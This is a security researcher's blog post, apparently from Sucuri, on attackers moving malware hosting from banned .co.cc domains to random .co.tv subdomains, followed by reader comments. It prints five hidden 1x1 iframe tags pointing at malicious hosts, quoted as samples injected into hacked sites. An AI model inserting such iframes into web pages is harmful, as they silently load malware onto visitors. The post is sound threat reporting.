Google blocks .co.cc, attackers are now using .co.tv

It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.

For us this is good news, since we haven’t been seeing anything good coming from there (only malware and spam). They did a similar thing a few weeks ago blacklisting the whole .cz.cc domain.

However, just as they blacklisted the .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:

<iframe src="http://uhcmsgfq&#46co&#46tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://yswlifofj&#46co&#46tv/?go=1" width="1" height="1"></iframe> 

<iframe width="1" height="1" src="http://vmvfonc&#46co&#46tv/?go=1"></iframe>

<iframe src="http://cvfplmpsap&#46co&#46tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://kwhnqxvslf&#46co&#46tv/?go=1" width="1" height="1"></iframe>

Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see by their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc) they are random and being mass generated.

We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.

What Google is doing is good, but the “war” is not over :)


If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Pingback: Google verbannt co.cc Domains aus dem Index()

  • Pingback: Google now blocking all co.cc subdomains from search, but who’s next? | CD DISK()

  • Pingback: Google now blocking all co.cc subdomains from search, but who’s next? « Internet « Computer « Computer & Business Update()

  • Brooka

    I’m astonished that belgian domains are being misused for spam. That West-European country has enough laws against cybercrime/spam too.

  • http://www.facebook.com/people/Wendy-Cockcroft/100002136226807 Wendy Cockcroft

    Google has blocked them both now, even though their own safe browsing API reports that it’s clear of malware.

  • http://www.4seo.ro Andrei

    Google should ban them all the free because that is free is a bit dangerous for ordinary people to come all kinds of shit on them

  • Sitton76

    the whole spam thing with the co.cc sites is ruining it for the people that use them as acual sites like myself, it makes things difficult when google won’t let me put my site on there listing. D:
    i disagree with the writer of this artical, this is NOT a good thing, maybe for the people who has jobs and can buy a domain name but not for use free users…

  • Wsiever

    There are some of use that use .co.cc extension for our site.  I myself am a paying customer and have never had a problem.  however co.tv and cz.cc are gone for good.

  • Recaptcha

    what about all of the good websites on those domains – they can’t say all 11 million are malicious as I own about 5 and none of them are!

Share This